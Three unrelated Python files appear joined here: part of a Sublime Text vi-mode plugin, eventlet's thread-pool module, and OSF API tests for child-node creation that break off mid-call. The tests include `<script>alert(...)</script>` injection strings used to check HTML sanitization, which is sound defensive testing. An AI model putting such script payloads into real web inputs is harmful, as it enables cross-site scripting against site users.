        self.view.run_command('vi_enter_normal_mode')
class _vi_ctrl_w_v_action(sublime_plugin.TextCommand):
    """Vim 'Ctrl-W v': split the window by opening a new pane."""

    def run(self, edit):
        self.view.window().run_command('new_pane', {})
class Sequence(sublime_plugin.TextCommand):
    """Run several commands as one edit. Required so that
    mark_undo_groups_for_gluing and friends work."""

    def run(self, edit, commands):
        for name, args in commands:
            self.view.run_command(name, args)

        # XXX: Sequence is a special case in that it doesn't run through vi_run,
        # so we need to ensure the next mode is correct. Maybe we can improve
        # this by making it more similar to regular commands?
        VintageState(self.view).enter_normal_mode()
class _vi_big_j(sublime_plugin.TextCommand):
    """Vim 'J': join the current line with the next one, collapsing the next
    line's leading whitespace into a single separating space."""

    def run(self, edit, mode=None):
        def f(view, s):
            if mode == _MODE_INTERNAL_NORMAL:
                full_current_line = view.full_line(s.b)
                # Caret ends up at the join point (just before the old EOL).
                target = full_current_line.b - 1
                full_next_line = view.full_line(full_current_line.b)
                two_lines = sublime.Region(full_current_line.a, full_next_line.b)

                # Text without \n.
                first_line_text = view.substr(view.line(full_current_line.a))
                next_line_text = view.substr(full_next_line)

                if len(next_line_text) > 1:
                    next_line_text = next_line_text.lstrip()

                # Separate with one space unless the first line already ends in one.
                sep = ''
                if first_line_text and not first_line_text.endswith(' '):
                    sep = ' '

                view.replace(edit, two_lines, first_line_text + sep + next_line_text)

                if first_line_text:
                    return sublime.Region(target, target)
                return s
            else:
                return s

        regions_transformer(self.view, f)
class _vi_ctrl_a(sublime_plugin.TextCommand):
    """Vim 'Ctrl-A': increment the number under each caret by `count`."""

    def run(self, edit, count=1, mode=None):
        def f(view, s):
            if mode == _MODE_INTERNAL_NORMAL:
                word = view.word(s.a)
                new_digit = int(view.substr(word)) + count
                view.replace(edit, word, str(new_digit))
            return s

        if mode != _MODE_INTERNAL_NORMAL:
            return

        # TODO: Deal with octal, hex notations.
        # TODO: Improve detection of numbers.
        # TODO: Find the next numeric word in the line if none is found under the caret.
        # Abort with a visual blink unless every caret sits on a purely numeric
        # word; note that this check also rejects negative numbers.
        words = [self.view.substr(self.view.word(s)) for s in self.view.sel()]
        if not all([w.isdigit() for w in words]):
            utils.blink()
            return

        regions_transformer(self.view, f)
class _vi_ctrl_x(sublime_plugin.TextCommand):
    """Vim 'Ctrl-X': decrement the number under each caret by `count`."""

    def run(self, edit, count=1, mode=None):
        def f(view, s):
            if mode == _MODE_INTERNAL_NORMAL:
                word = view.word(s.a)
                new_digit = int(view.substr(word)) - count
                view.replace(edit, word, str(new_digit))
            return s

        if mode != _MODE_INTERNAL_NORMAL:
            return

        # TODO: Deal with octal, hex notations.
        # TODO: Improve detection of numbers.
        # TODO: Find the next numeric word in the line if none is found under the caret.
        # Abort with a visual blink unless every caret sits on a purely numeric
        # word; note that this check also rejects negative numbers.
        words = [self.view.substr(self.view.word(s)) for s in self.view.sel()]
        if not all([w.isdigit() for w in words]):
            utils.blink()
            return

        regions_transformer(self.view, f)
class _vi_g_v(IrreversibleTextCommand):
    """Vim 'gv': restore the last visual selection (assumes normal mode)."""

    def run(self):
        restored = self.view.get_regions('vi_visual_selections')
        if not restored:
            restored = list(self.view.sel())

        self.view.sel().clear()
        for region in restored:
            self.view.sel().add(region)
class ViQ(IrreversibleTextCommand):
    """Vim 'q': arm macro recording and wait for the register name."""

    def run(self):
        vstate = VintageState(self.view)
        vstate.action = 'vi_q'
        vstate.expecting_user_input = True
class _vi_q(IrreversibleTextCommand):
    """Vim 'q': toggle macro recording.

    With a register name while idle, start recording into that register;
    while recording, stop and store the recorded command away.
    """

    def run(self, name=None):
        state = VintageState(self.view)
        # FIX: identity comparison for None (was `name == None`).
        if name is None and not state.is_recording:
            return

        if not state.is_recording:
            # Start recording into `name`.
            state._latest_macro_name = name
            state.is_recording = True
            self.view.run_command('start_record_macro')
            return

        # We were recording: stop, then store the macro away.
        self.view.run_command('stop_record_macro')
        state.is_recording = False
        state.reset()
        modifying_cmd = self.view.command_history(0, True)
        state.latest_macro = modifying_cmd
class _vi_run_macro(IrreversibleTextCommand):
    """Vim '@': replay a recorded macro ('@@' replays the latest one)."""

    def run(self, name=None):
        state = VintageState(self.view)
        if not name or not state.latest_macro:
            return

        if name == '@':
            # Run the macro recorded latest.
            self.view.run_command('run_macro')
        else:
            # TODO: Implement macro registers.
            self.view.run_command('run_command')
class ViAt(IrreversibleTextCommand):
    """Vim '@': arm macro playback and wait for the register name."""

    def run(self):
        vstate = VintageState(self.view)
        vstate.action = 'vi_at'
        vstate.expecting_user_input = True
| |
# Copyright (c) 2007-2009, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import imp
import os
import sys
import traceback
import eventlet
from eventlet import event, greenio, greenthread, patcher, timeout
import six
__all__ = ['execute', 'Proxy', 'killall', 'set_num_threads']
# Exceptions worth capturing in a worker and shipping back to the caller.
EXC_CLASSES = (Exception, timeout.Timeout)
# Exceptions that must propagate inside the worker thread itself.
SYS_EXCS = (GeneratorExit, KeyboardInterrupt, SystemExit)

# When False, exceptions re-raised by execute() are also printed with a stack trace.
QUIET = True

# Use the real (unpatched) modules: the pool runs in native OS threads.
socket = patcher.original('socket')
threading = patcher.original('threading')
if six.PY2:
    Queue_module = patcher.original('Queue')
if six.PY3:
    Queue_module = patcher.original('queue')

Empty = Queue_module.Empty
Queue = Queue_module.Queue

# Single wake-up byte workers write to _wsock after posting a result.
_bytetosend = b' '
# Greenthread running tpool_trampoline — presumably started by setup(); not visible here.
_coro = None
# Number of native worker threads in the pool.
_nthreads = int(os.environ.get('EVENTLET_THREADPOOL_SIZE', 20))
# Request/response queues shared between greenthreads and workers.
_reqq = _rspq = None
# Socket pair used to wake the hub when responses are ready.
_rsock = _wsock = None
_setup_already = False
# The native worker threads themselves.
_threads = []
def tpool_trampoline():
    """Greenthread loop: deliver worker results to their waiting events.

    Blocks (cooperatively) on the read end of the wake-up socket; each byte
    received signals that the response queue may contain results.
    """
    global _rspq
    while True:
        try:
            _c = _rsock.recv(1)
            assert _c
            # FIXME: this is probably redundant since using sockets instead of pipe now
        except ValueError:
            break  # will be raised when pipe is closed
        while not _rspq.empty():
            try:
                (e, rv) = _rspq.get(block=False)
                e.send(rv)
                # Drop references promptly so results don't linger.
                e = rv = None
            except Empty:
                pass
def tworker():
    """Main loop of a native worker thread.

    Pulls (event, callable, args, kwargs) requests off the request queue,
    runs the callable, posts the result (or the exc_info triple on failure)
    to the response queue, then writes one byte to wake the hub.
    """
    global _rspq
    while True:
        try:
            msg = _reqq.get()
        except AttributeError:
            return  # can't get anything off of a dud queue
        if msg is None:
            # Sentinel: shut this worker down.
            return
        (e, meth, args, kwargs) = msg
        rv = None
        try:
            rv = meth(*args, **kwargs)
        except SYS_EXCS:
            raise
        except EXC_CLASSES:
            # Ship the exception back as an exc_info triple; execute() re-raises it.
            rv = sys.exc_info()
            if sys.version_info >= (3, 4):
                traceback.clear_frames(rv[1].__traceback__)
            if six.PY2:
                sys.exc_clear()
        # test_leakage_from_tracebacks verifies that the use of
        # exc_info does not lead to memory leaks
        _rspq.put((e, rv))
        # Clear all references before blocking on the queue again.
        msg = meth = args = kwargs = e = rv = None
        _wsock.sendall(_bytetosend)
def execute(meth, *args, **kwargs):
    """
    Execute *meth* in a Python thread, blocking the current coroutine/
    greenthread until the method completes.

    The primary use case for this is to wrap an object or module that is not
    amenable to monkeypatching or any of the other tricks that Eventlet uses
    to achieve cooperative yielding. With tpool, you can force such objects to
    cooperate with green threads by sticking them in native threads, at the cost
    of some overhead.

    Exceptions raised inside the worker (other than SystemExit and friends)
    are re-raised here in the calling greenthread.
    """
    setup()
    # if already in tpool, don't recurse into the tpool
    # also, call functions directly if we're inside an import lock, because
    # if meth does any importing (sadly common), it will hang
    # FIX: current_thread() — currentThread() is a deprecated alias.
    my_thread = threading.current_thread()
    if my_thread in _threads or imp.lock_held() or _nthreads == 0:
        return meth(*args, **kwargs)

    e = event.Event()
    _reqq.put((e, meth, args, kwargs))
    rv = e.wait()

    # A worker ships failures back as a sys.exc_info() triple (see tworker);
    # detect that shape and re-raise in this greenthread.
    if isinstance(rv, tuple) \
            and len(rv) == 3 \
            and isinstance(rv[1], EXC_CLASSES):
        (c, e, tb) = rv
        if not QUIET:
            traceback.print_exception(c, e, tb)
            traceback.print_stack()
        six.reraise(c, e, tb)
    return rv
def proxy_call(autowrap, f, *args, **kwargs):
    """
    Invoke *f* and return its result, wrapping the result in a
    :class:`Proxy` when its type appears in the *autowrap* collection.

    By default the call is shipped to the native thread pool through
    :func:`execute`; passing the keyword argument ``nonblocking=True``
    short-circuits that and runs *f* directly on the calling greenthread.
    This is useful for objects whose methods never block but whose return
    values should still be Proxy-wrapped.
    """
    run_directly = kwargs.pop('nonblocking', False)
    result = f(*args, **kwargs) if run_directly else execute(f, *args, **kwargs)
    return Proxy(result, autowrap) if isinstance(result, autowrap) else result
class Proxy(object):
    """
    a simple proxy-wrapper of any object that comes with a
    methods-only interface, in order to forward every method
    invocation onto a thread in the native-thread pool. A key
    restriction is that the object's methods should not switch
    greenlets or use Eventlet primitives, since they are in a
    different thread from the main hub, and therefore might behave
    unexpectedly. This is for running native-threaded code
    only.

    It's common to want to have some of the attributes or return
    values also wrapped in Proxy objects (for example, database
    connection objects produce cursor objects which also should be
    wrapped in Proxy objects to remain nonblocking). *autowrap*, if
    supplied, is a collection of types; if an attribute or return
    value matches one of those types (via isinstance), it will be
    wrapped in a Proxy. *autowrap_names* is a collection
    of strings, which represent the names of attributes that should be
    wrapped in Proxy objects when accessed.
    """

    def __init__(self, obj, autowrap=(), autowrap_names=()):
        self._obj = obj  # the wrapped native object
        self._autowrap = autowrap  # types whose values get re-wrapped
        self._autowrap_names = autowrap_names  # attribute names to re-wrap

    def __getattr__(self, attr_name):
        f = getattr(self._obj, attr_name)
        if not hasattr(f, '__call__'):
            # plain (non-callable) attribute: wrap it if its type or name
            # says so, otherwise hand it back directly
            if isinstance(f, self._autowrap) or attr_name in self._autowrap_names:
                return Proxy(f, self._autowrap)
            return f

        # callable attribute: return a closure that routes the call into
        # the thread pool via proxy_call
        def doit(*args, **kwargs):
            result = proxy_call(self._autowrap, f, *args, **kwargs)
            if attr_name in self._autowrap_names and not isinstance(result, Proxy):
                return Proxy(result)
            return result
        return doit

    # the following are a bunch of methods that the python interpreter
    # doesn't use getattr to retrieve and therefore have to be defined
    # explicitly
    def __getitem__(self, key):
        return proxy_call(self._autowrap, self._obj.__getitem__, key)

    def __setitem__(self, key, value):
        return proxy_call(self._autowrap, self._obj.__setitem__, key, value)

    def __deepcopy__(self, memo=None):
        return proxy_call(self._autowrap, self._obj.__deepcopy__, memo)

    def __copy__(self, memo=None):
        return proxy_call(self._autowrap, self._obj.__copy__, memo)

    def __call__(self, *a, **kw):
        if '__call__' in self._autowrap_names:
            return Proxy(proxy_call(self._autowrap, self._obj, *a, **kw))
        else:
            return proxy_call(self._autowrap, self._obj, *a, **kw)

    def __enter__(self):
        return proxy_call(self._autowrap, self._obj.__enter__)

    def __exit__(self, *exc):
        return proxy_call(self._autowrap, self._obj.__exit__, *exc)

    # these don't go through a proxy call, because they're likely to
    # be called often, and are unlikely to be implemented on the
    # wrapped object in such a way that they would block
    def __eq__(self, rhs):
        return self._obj == rhs

    def __hash__(self):
        return self._obj.__hash__()

    def __repr__(self):
        return self._obj.__repr__()

    def __str__(self):
        return self._obj.__str__()

    def __len__(self):
        return len(self._obj)

    def __nonzero__(self):
        return bool(self._obj)
    # Python3
    __bool__ = __nonzero__

    def __iter__(self):
        it = iter(self._obj)
        if it == self._obj:
            # the object is its own iterator: keep handing out this Proxy
            # so next() calls stay in the thread pool
            return self
        else:
            return Proxy(it)

    def next(self):
        return proxy_call(self._autowrap, next, self._obj)
    # Python3
    __next__ = next
def setup():
    """One-time initialization of the thread pool.

    Creates the request/response queues, a connected loopback TCP socket
    pair used to wake the green side, the pool of native worker threads,
    and the trampoline greenthread.  Safe to call repeatedly; only the
    first call does any work.
    """
    global _rsock, _wsock, _coro, _setup_already, _rspq, _reqq
    if _setup_already:
        return
    else:
        _setup_already = True
    assert _nthreads >= 0, "Can't specify negative number of threads"
    if _nthreads == 0:
        import warnings
        warnings.warn("Zero threads in tpool. All tpool.execute calls will\
            execute in main thread. Check the value of the environment \
            variable EVENTLET_THREADPOOL_SIZE.", RuntimeWarning)
    _reqq = Queue(maxsize=-1)
    _rspq = Queue(maxsize=-1)
    # connected socket pair: _wsock is the native (write) end,
    # _rsock the green (read) end watched by tpool_trampoline
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(('127.0.0.1', 0))
    sock.listen(1)
    csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    csock.connect(sock.getsockname())
    csock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
    _wsock, _addr = sock.accept()
    _wsock.settimeout(None)
    _wsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
    sock.close()
    _rsock = greenio.GreenSocket(csock)
    _rsock.settimeout(None)
    # daemon threads so a forgotten pool never blocks interpreter exit
    for i in six.moves.range(_nthreads):
        t = threading.Thread(target=tworker,
                             name="tpool_thread_%s" % i)
        t.setDaemon(True)
        t.start()
        _threads.append(t)
    _coro = greenthread.spawn_n(tpool_trampoline)
    # This yield fixes subtle error with GreenSocket.__del__
    eventlet.sleep(0)
# Avoid ResourceWarning unclosed socket on Python3.2+
@atexit.register
def killall():
    """Tear down the thread pool (registered to run at interpreter exit).

    Sends one shutdown sentinel per worker, joins them all, drains any
    results still queued, kills the trampoline greenthread, and closes the
    socket pair so setup() could run again cleanly.
    """
    global _setup_already, _rspq, _rsock, _wsock
    if not _setup_already:
        return
    # This yield fixes freeze in some scenarios
    eventlet.sleep(0)
    # one None sentinel per worker, then wait for each to exit
    for thr in _threads:
        _reqq.put(None)
    for thr in _threads:
        thr.join()
    del _threads[:]
    # return any remaining results
    while (_rspq is not None) and not _rspq.empty():
        try:
            (e, rv) = _rspq.get(block=False)
            e.send(rv)
            e = rv = None
        except Empty:
            pass
    if _coro is not None:
        greenthread.kill(_coro)
    if _rsock is not None:
        _rsock.close()
        _rsock = None
    if _wsock is not None:
        _wsock.close()
        _wsock = None
    _rspq = None
    _setup_already = False
def set_num_threads(nthreads):
    """Set the size of the native thread pool.

    Only affects a pool created after this call (setup() reads
    ``_nthreads`` once); it does not resize an already-running pool.
    """
    global _nthreads
    _nthreads = nthreads
| |
import pytest
from api.base.settings.defaults import API_BASE
from framework.auth.core import Auth
from osf.models import AbstractNode, NodeLog
from osf_tests.factories import (
NodeFactory,
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
)
from tests.base import fake
from website.util import permissions
from website.util.sanitize import strip_html
@pytest.fixture()
def user():
    # A fresh authenticated user, shared by every test class in this module.
    return AuthUserFactory()
@pytest.mark.django_db
class TestNodeChildrenList:
    """GET /nodes/{id}/children/: visibility rules for the children list.

    Covers public vs. private projects, logged-out / non-contributor /
    contributor access, and exclusion of pointers, unauthorized components,
    deleted components, and node links.
    """

    @pytest.fixture()
    def private_project(self, user):
        # private project with *user* as a read+write contributor
        private_project = ProjectFactory()
        private_project.add_contributor(
            user,
            permissions=[
                permissions.READ,
                permissions.WRITE
            ]
        )
        private_project.save()
        return private_project

    @pytest.fixture()
    def component(self, user, private_project):
        return NodeFactory(parent=private_project, creator=user)

    @pytest.fixture()
    def pointer(self):
        return ProjectFactory()

    @pytest.fixture()
    def private_project_url(self, private_project):
        return '/{}nodes/{}/children/'.format(API_BASE, private_project._id)

    @pytest.fixture()
    def public_project(self, user):
        return ProjectFactory(is_public=True, creator=user)

    @pytest.fixture()
    def public_component(self, user, public_project):
        return NodeFactory(parent=public_project, creator=user, is_public=True)

    @pytest.fixture()
    def public_project_url(self, user, public_project):
        return '/{}nodes/{}/children/'.format(API_BASE, public_project._id)

    def test_return_public_node_children_list(
            self, app, public_component,
            public_project_url):

        # test_return_public_node_children_list_logged_out
        res = app.get(public_project_url)
        assert res.status_code == 200
        assert res.content_type == 'application/vnd.api+json'
        assert len(res.json['data']) == 1
        assert res.json['data'][0]['id'] == public_component._id

        # test_return_public_node_children_list_logged_in
        non_contrib = AuthUserFactory()
        res = app.get(public_project_url, auth=non_contrib.auth)
        assert res.status_code == 200
        assert res.content_type == 'application/vnd.api+json'
        assert len(res.json['data']) == 1
        assert res.json['data'][0]['id'] == public_component._id

    def test_return_private_node_children_list(
            self, app, user, component, private_project_url):

        # test_return_private_node_children_list_logged_out
        res = app.get(private_project_url, expect_errors=True)
        assert res.status_code == 401
        assert 'detail' in res.json['errors'][0]

        # test_return_private_node_children_list_logged_in_non_contributor
        non_contrib = AuthUserFactory()
        res = app.get(
            private_project_url,
            auth=non_contrib.auth,
            expect_errors=True)
        assert res.status_code == 403
        assert 'detail' in res.json['errors'][0]

        # test_return_private_node_children_list_logged_in_contributor
        res = app.get(private_project_url, auth=user.auth)
        assert res.status_code == 200
        assert res.content_type == 'application/vnd.api+json'
        assert len(res.json['data']) == 1
        assert res.json['data'][0]['id'] == component._id

    def test_node_children_list_does_not_include_pointers(
            self, app, user, component, private_project_url):
        res = app.get(private_project_url, auth=user.auth)
        assert len(res.json['data']) == 1

    def test_node_children_list_does_not_include_unauthorized_projects(
            self, app, user, component, private_project, private_project_url):
        # a component *user* is not a contributor on must not be listed
        NodeFactory(parent=private_project)
        res = app.get(private_project_url, auth=user.auth)
        assert len(res.json['data']) == 1

    def test_node_children_list_does_not_include_deleted(
            self, app, user, public_project, public_component,
            component, public_project_url):
        child_project = NodeFactory(parent=public_project, creator=user)
        child_project.save()

        res = app.get(public_project_url, auth=user.auth)
        assert res.status_code == 200
        ids = [node['id'] for node in res.json['data']]
        assert child_project._id in ids
        assert 2 == len(ids)

        # soft-delete the child and verify it disappears from the list
        child_project.is_deleted = True
        child_project.save()

        res = app.get(public_project_url, auth=user.auth)
        assert res.status_code == 200
        ids = [node['id'] for node in res.json['data']]
        assert child_project._id not in ids
        assert 1 == len(ids)

    def test_node_children_list_does_not_include_node_links(
            self, app, user, public_project, public_component,
            public_project_url):
        pointed_to = ProjectFactory(is_public=True)
        public_project.add_pointer(
            pointed_to,
            auth=Auth(public_project.creator)
        )
        res = app.get(public_project_url, auth=user.auth)
        ids = [node['id'] for node in res.json['data']]
        assert public_component._id in ids  # sanity check
        assert pointed_to._id not in ids
@pytest.mark.django_db
class TestNodeChildrenListFiltering:
    """Filtering the children list by title returns only matching nodes."""

    def test_node_child_filtering(self, app, user):
        project = ProjectFactory(creator=user)
        title_one, title_two = fake.bs(), fake.bs()
        component = NodeFactory(title=title_one, parent=project)
        component_two = NodeFactory(title=title_two, parent=project)

        url = '/{}nodes/{}/children/?filter[title]={}'.format(
            API_BASE,
            project._id,
            title_one
        )
        res = app.get(url, auth=user.auth)
        ids = [node['id'] for node in res.json['data']]
        assert component._id in ids
        assert component_two._id not in ids
@pytest.mark.django_db
class TestNodeChildCreate:
    """POST /nodes/{id}/children/: creating a single child node.

    Covers auth/permission failures, malformed JSON-API payloads, success
    for write contributors and the owner, HTML sanitization, and the
    registration case (children cannot be added to registrations).
    """

    @pytest.fixture()
    def project(self, user):
        return ProjectFactory(creator=user, is_public=True)

    @pytest.fixture()
    def url(self, project):
        return '/{}nodes/{}/children/'.format(API_BASE, project._id)

    @pytest.fixture()
    def child(self):
        # a well-formed JSON-API payload for a child node
        return {
            'data': {
                'type': 'nodes',
                'attributes': {
                    'title': 'child',
                    'description': 'this is a child project',
                    'category': 'project'
                }
            }
        }

    def test_creates_child(self, app, user, project, child, url):
        # test_creates_child_logged_out_user
        res = app.post_json_api(url, child, expect_errors=True)
        assert res.status_code == 401
        project.reload()
        assert len(project.nodes) == 0

        # test_creates_child_logged_in_read_contributor
        read_contrib = AuthUserFactory()
        project.add_contributor(
            read_contrib,
            permissions=[permissions.READ],
            auth=Auth(user), save=True
        )
        res = app.post_json_api(
            url, child, auth=read_contrib.auth,
            expect_errors=True
        )
        assert res.status_code == 403
        project.reload()
        assert len(project.nodes) == 0

        # test_creates_child_logged_in_non_contributor
        non_contrib = AuthUserFactory()
        res = app.post_json_api(
            url, child, auth=non_contrib.auth,
            expect_errors=True
        )
        assert res.status_code == 403
        project.reload()
        assert len(project.nodes) == 0

        # test_creates_child_no_type
        child = {
            'data': {
                'attributes': {
                    'title': 'child',
                    'description': 'this is a child project',
                    'category': 'project',
                }
            }
        }
        res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
        assert res.status_code == 400
        assert res.json['errors'][0]['detail'] == 'This field may not be null.'
        assert res.json['errors'][0]['source']['pointer'] == '/data/type'

        # test_creates_child_incorrect_type
        child = {
            'data': {
                'type': 'Wrong type.',
                'attributes': {
                    'title': 'child',
                    'description': 'this is a child project',
                    'category': 'project',
                }
            }
        }
        res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
        assert res.status_code == 409
        assert res.json['errors'][0]['detail'] == 'This resource has a type of "nodes", but you set the json body\'s type field to "Wrong type.". You probably need to change the type field to match the resource\'s type.'

        # test_creates_child_properties_not_nested
        child = {
            'data': {
                'title': 'child',
                'description': 'this is a child project',
                'category': 'project',
            }
        }
        res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
        assert res.status_code == 400
        assert res.json['errors'][0]['detail'] == 'Request must include /data/attributes.'
        assert res.json['errors'][0]['source']['pointer'] == '/data/attributes'

    def test_creates_child_logged_in_write_contributor(
            self, app, user, project, child, url):
        write_contrib = AuthUserFactory()
        project.add_contributor(
            write_contrib,
            permissions=[
                permissions.READ,
                permissions.WRITE],
            auth=Auth(user),
            save=True)

        res = app.post_json_api(url, child, auth=write_contrib.auth)
        assert res.status_code == 201
        assert res.json['data']['attributes']['title'] == child['data']['attributes']['title']
        assert res.json['data']['attributes']['description'] == child['data']['attributes']['description']
        assert res.json['data']['attributes']['category'] == child['data']['attributes']['category']

        project.reload()
        child_id = res.json['data']['id']
        assert child_id == project.nodes[0]._id
        assert AbstractNode.load(child_id).logs.latest(
        ).action == NodeLog.PROJECT_CREATED

    def test_creates_child_logged_in_owner(
            self, app, user, project, child, url):
        res = app.post_json_api(url, child, auth=user.auth)
        assert res.status_code == 201
        assert res.json['data']['attributes']['title'] == child['data']['attributes']['title']
        assert res.json['data']['attributes']['description'] == child['data']['attributes']['description']
        assert res.json['data']['attributes']['category'] == child['data']['attributes']['category']

        project.reload()
        assert res.json['data']['id'] == project.nodes[0]._id
        assert project.nodes[0].logs.latest().action == NodeLog.PROJECT_CREATED

    def test_creates_child_creates_child_and_sanitizes_html_logged_in_owner(
            self, app, user, project, url):
        # markup in title/description must come back stripped
        title = '<em>Reasonable</em> <strong>Project</strong>'
        description = 'An <script>alert("even reasonabler")</script> child'

        res = app.post_json_api(url, {
            'data': {
                'type': 'nodes',
                'attributes': {
                    'title': title,
                    'description': description,
                    'category': 'project',
                    'public': True
                }
            }
        }, auth=user.auth)
        child_id = res.json['data']['id']
        assert res.status_code == 201
        url = '/{}nodes/{}/'.format(API_BASE, child_id)

        res = app.get(url, auth=user.auth)
        assert res.json['data']['attributes']['title'] == strip_html(title)
        assert res.json['data']['attributes']['description'] == strip_html(
            description)
        assert res.json['data']['attributes']['category'] == 'project'

        project.reload()
        child_id = res.json['data']['id']
        assert child_id == project.nodes[0]._id
        assert AbstractNode.load(child_id).logs.latest(
        ).action == NodeLog.PROJECT_CREATED

    def test_cannot_create_child_on_a_registration(self, app, user, project):
        registration = RegistrationFactory(project=project, creator=user)
        url = '/{}nodes/{}/children/'.format(API_BASE, registration._id)
        res = app.post_json_api(url, {
            'data': {
                'type': 'nodes',
                'attributes': {
                    'title': fake.catch_phrase(),
                    'description': fake.bs(),
                    'category': 'project',
                    'public': True,
                }
            }
        }, auth=user.auth, expect_errors=True)
        assert res.status_code == 404
@pytest.mark.django_db
class TestNodeChildrenBulkCreate:
    """POST /nodes/{id}/children/ with ``bulk=True``: creating many children.

    Covers the bulk size limit, auth failures, success for owner and write
    contributors, HTML sanitization, registrations, and malformed payloads
    (missing type, wrong type, attributes not nested).
    """

    @pytest.fixture()
    def project(self, user):
        return ProjectFactory(creator=user, is_public=True)

    @pytest.fixture()
    def url(self, project):
        return '/{}nodes/{}/children/'.format(API_BASE, project._id)

    @pytest.fixture()
    def child_one(self):
        return {
            'type': 'nodes',
            'attributes': {
                'title': 'child',
                'description': 'this is a child project',
                'category': 'project'
            }
        }

    @pytest.fixture()
    def child_two(self):
        return {
            'type': 'nodes',
            'attributes': {
                'title': 'second child',
                'description': 'this is my hypothesis',
                'category': 'hypothesis'
            }
        }

    def test_bulk_children_create_blank_request(self, app, user, url):
        res = app.post_json_api(
            url, auth=user.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 400

    def test_bulk_creates_children_limits(self, app, user, child_one, url):
        # 101 items exceeds the bulk limit of 100
        res = app.post_json_api(
            url, {'data': [child_one] * 101},
            auth=user.auth, expect_errors=True, bulk=True
        )
        assert res.status_code == 400
        assert res.json['errors'][0]['detail'] == 'Bulk operation limit is 100, got 101.'
        assert res.json['errors'][0]['source']['pointer'] == '/data'

    def test_bulk_creates_children_auth_errors(
            self, app, user, project, child_one, child_two, url):
        # test_bulk_creates_children_logged_out_user
        res = app.post_json_api(
            url,
            {'data': [child_one, child_two]},
            expect_errors=True, bulk=True
        )
        assert res.status_code == 401
        project.reload()
        assert len(project.nodes) == 0

        # test_bulk_creates_children_logged_in_read_contributor
        read_contrib = AuthUserFactory()
        project.add_contributor(
            read_contrib,
            permissions=[permissions.READ],
            auth=Auth(user),
            save=True)
        res = app.post_json_api(
            url,
            {'data': [child_one, child_two]},
            auth=read_contrib.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 403
        project.reload()
        assert len(project.nodes) == 0

        # test_bulk_creates_children_logged_in_non_contributor
        non_contrib = AuthUserFactory()
        res = app.post_json_api(
            url,
            {'data': [child_one, child_two]},
            auth=non_contrib.auth,
            expect_errors=True, bulk=True)
        assert res.status_code == 403
        project.reload()
        assert len(project.nodes) == 0

    def test_bulk_creates_children_logged_in_owner(
            self, app, user, project, child_one, child_two, url):
        res = app.post_json_api(
            url,
            {'data': [child_one, child_two]},
            auth=user.auth, bulk=True)
        assert res.status_code == 201
        assert res.json['data'][0]['attributes']['title'] == child_one['attributes']['title']
        assert res.json['data'][0]['attributes']['description'] == child_one['attributes']['description']
        assert res.json['data'][0]['attributes']['category'] == child_one['attributes']['category']
        assert res.json['data'][1]['attributes']['title'] == child_two['attributes']['title']
        assert res.json['data'][1]['attributes']['description'] == child_two['attributes']['description']
        assert res.json['data'][1]['attributes']['category'] == child_two['attributes']['category']

        project.reload()
        nodes = project.nodes
        assert res.json['data'][0]['id'] == nodes[0]._id
        assert res.json['data'][1]['id'] == nodes[1]._id

        assert nodes[0].logs.latest().action == NodeLog.PROJECT_CREATED
        assert nodes[1].logs.latest().action == NodeLog.PROJECT_CREATED

    def test_bulk_creates_children_child_logged_in_write_contributor(
            self, app, user, project, child_one, child_two, url):
        write_contrib = AuthUserFactory()
        project.add_contributor(
            write_contrib,
            permissions=[
                permissions.READ,
                permissions.WRITE],
            auth=Auth(user),
            save=True)

        res = app.post_json_api(
            url,
            {'data': [child_one, child_two]},
            auth=write_contrib.auth, bulk=True)
        assert res.status_code == 201
        assert res.json['data'][0]['attributes']['title'] == child_one['attributes']['title']
        assert res.json['data'][0]['attributes']['description'] == child_one['attributes']['description']
        assert res.json['data'][0]['attributes']['category'] == child_one['attributes']['category']
        assert res.json['data'][1]['attributes']['title'] == child_two['attributes']['title']
        assert res.json['data'][1]['attributes']['description'] == child_two['attributes']['description']
        assert res.json['data'][1]['attributes']['category'] == child_two['attributes']['category']

        project.reload()
        child_id = res.json['data'][0]['id']
        child_two_id = res.json['data'][1]['id']
        nodes = project.nodes
        assert child_id == nodes[0]._id
        assert child_two_id == nodes[1]._id

        assert AbstractNode.load(child_id).logs.latest(
        ).action == NodeLog.PROJECT_CREATED
        assert nodes[1].logs.latest().action == NodeLog.PROJECT_CREATED

    def test_bulk_creates_children_and_sanitizes_html_logged_in_owner(
            self, app, user, project, url):
        title = '<em>Reasoning</em> <strong>Aboot Projects</strong>'
        description = 'A <script>alert("super reasonable")</script> child'

        res = app.post_json_api(url, {
            'data': [{
                'type': 'nodes',
                'attributes': {
                    'title': title,
                    'description': description,
                    'category': 'project',
                    'public': True
                }
            }]
        }, auth=user.auth, bulk=True)
        child_id = res.json['data'][0]['id']
        assert res.status_code == 201
        url = '/{}nodes/{}/'.format(API_BASE, child_id)

        res = app.get(url, auth=user.auth)
        assert res.json['data']['attributes']['title'] == strip_html(title)
        assert res.json['data']['attributes']['description'] == strip_html(
            description)
        assert res.json['data']['attributes']['category'] == 'project'

        project.reload()
        child_id = res.json['data']['id']
        assert child_id == project.nodes[0]._id
        assert AbstractNode.load(child_id).logs.latest(
        ).action == NodeLog.PROJECT_CREATED

    def test_cannot_bulk_create_children_on_a_registration(
            self, app, user, project, child_two):
        registration = RegistrationFactory(project=project, creator=user)
        url = '/{}nodes/{}/children/'.format(API_BASE, registration._id)
        res = app.post_json_api(url, {
            'data': [child_two, {
                'type': 'nodes',
                'attributes': {
                    'title': fake.catch_phrase(),
                    'description': fake.bs(),
                    'category': 'project',
                    'public': True,
                }
            }]
